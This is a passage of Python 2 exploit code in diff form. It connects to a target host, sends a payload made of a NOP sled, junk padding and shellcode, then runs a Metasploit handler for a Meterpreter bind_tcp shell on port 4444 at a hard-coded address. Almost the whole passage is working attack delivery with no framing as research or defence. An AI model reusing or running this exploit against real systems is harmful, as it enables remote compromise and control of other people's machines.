socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +try: + s.connect((host, port)) + print " [+] Sending payload.." + "nop: " + str(len(nop)) + " junk: " + str(len(junk)) + " shellcode: " + str(len(shellcode)) + s.send(req) + data = s.recv(1024) + print " [+] Closing connection.." + s.close() + print "[+] Exploit Sent Successfully" + print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444\r" + print "\r" + time.sleep(3) + os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E") + print "[-] Connection lost from " + host + ":4444 \r" +except: + print "[-] Could not connect to " + host + ":4444\r" + sys.exit(0)